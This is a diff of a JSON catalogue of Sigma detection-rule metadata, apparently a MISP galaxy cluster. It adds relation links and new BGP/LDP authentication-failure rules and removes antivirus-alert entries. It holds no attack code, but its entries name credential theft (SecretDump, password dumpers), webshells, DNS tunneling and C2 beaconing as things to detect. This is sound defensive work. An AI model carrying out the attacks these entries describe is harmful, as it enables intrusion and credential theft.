"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" ], "tags": [ @@ -151,6 +207,15 @@ "attack.t1041" ] }, + "related": [ + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "881834a4-6659-4773-821e-1c151789d873", "value": "Equation Group C2 Communication" }, @@ -167,10 +232,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://core.telegram.org/bots/faq", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -178,6 +243,15 @@ "attack.t1102.002" ] }, + "related": [ + { + "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c64c5175-5189-431b-a55e-6d9882158251", "value": "Telegram Bot API Request" }, @@ -204,6 +278,22 @@ "attack.t1595.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", "value": "DNS Query to External Service Interaction Domains" }, @@ -229,6 +319,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", "value": "Cobalt Strike DNS Beaconing" }, @@ -252,6 +351,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", "value": "High DNS Bytes Out" }, @@ -277,6 +385,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", "value": "High NULL Records Requests Rate" }, @@ -293,8 +417,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://zeltser.com/c2-dns-tunneling/", "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://zeltser.com/c2-dns-tunneling/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" ], "tags": [ @@ -304,6 +428,22 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", "value": "Possible DNS Tunneling" }, @@ -329,6 +469,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", "value": "DNS TXT Answer with Possible Execution Strings" }, @@ -354,6 +503,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", "value": "High TXT Records Requests Rate" }, @@ -380,6 +545,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", "value": "Suspicious DNS Query with B64 Encoded String" }, @@ -405,6 +586,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", "value": "High DNS Requests Rate" }, @@ -429,6 +626,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", "value": "Wannacry Killswitch Domain" }, @@ -454,6 +660,22 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", "value": "Monero Crypto Coin Mining Pool Lookup" }, @@ -485,6 +707,22 @@ "attack.t1124" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", "value": "Cisco Discovery" }, @@ -512,6 +750,29 @@ "attack.t1053" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "value": "Cisco Modify Configuration" }, @@ -538,6 +799,29 @@ "attack.t1561.002" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", "value": "Cisco File Deletion" }, @@ -566,6 +850,29 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "value": "Cisco Stage Data" }, @@ -589,6 +896,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "value": "Cisco Show Commands Input" }, @@ -616,6 +932,22 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", "value": "Cisco Collect Data" }, @@ -664,6 +996,29 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", "value": "Cisco Denial of Service" }, @@ -712,6 +1067,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "value": "Cisco Local Accounts" }, @@ -737,6 +1108,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "value": "Cisco Crypto Commands" }, @@ -760,9 +1140,111 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", "value": "Cisco Clear Logs" }, + { + "description": "Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "cisco_ldp_md5_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", + "value": "Cisco LDP Authentication Failures" + }, + { + "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "cisco_bgp_md5_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "56fa3cd6-f8d6-4520-a8c7-607292971886", + "value": "Cisco BGP Authentication Failures" + }, + { + "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", + "meta": { + "author": "Tim Brown", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unlikely. Except due to misconfigurations" + ], + "filename": "huawei_bgp_auth_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "huawei", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.credential_access", + "attack.collection", + "attack.t1078", + "attack.t1110", + "attack.t1557" + ] + }, + "uuid": "a557ffe6-ac54-43d2-ae69-158027082350", + "value": "Huawei BGP Authentication Failures" + }, { "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "meta": { @@ -847,10 +1329,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -858,6 +1340,22 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "value": "Potential PetitPotam Attack Via EFS RPC Calls" }, @@ -882,6 +1380,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "value": "WebDav Put Request" }, @@ -909,6 +1416,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" }, @@ -934,6 +1450,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "value": "Executable from Webdav" }, @@ -957,6 +1482,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", "value": "DNS TOR Proxies" }, @@ -990,6 +1524,43 @@ "attack.t1210" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", "value": "OMIGOD HTTP No Authentication RCE" }, @@ -1017,6 +1588,29 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, @@ -1043,6 +1637,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, @@ -1083,8 +1700,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/nknorg/nkn-sdk-go", "https://github.com/Maka8ka/NGLite", + "https://github.com/nknorg/nkn-sdk-go", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], @@ -1160,8 +1777,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" ], "tags": [ @@ -1194,6 +1811,22 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", "value": "DNS Events Related To Mining Pools" }, @@ -1210,12 +1843,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://github.com/corelight/CVE-2021-1675", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ @@ -1298,6 +1931,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, @@ -1315,10 +1971,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://twitter.com/neu5ron/status/1346245602502443009", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ @@ -1327,6 +1983,22 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "value": "Suspicious DNS Z Flag Bit Set" }, @@ -1352,221 +2024,18 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", "value": "Django Framework Exceptions" }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_password_dumper.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ] - }, - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - "value": "Antivirus Password Dumper Detection" - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "meta": { - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "filename": "av_printernightmare_cve_2021_34527.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_relevant_files.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_exploiting.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_hacktool.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_webshell.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - 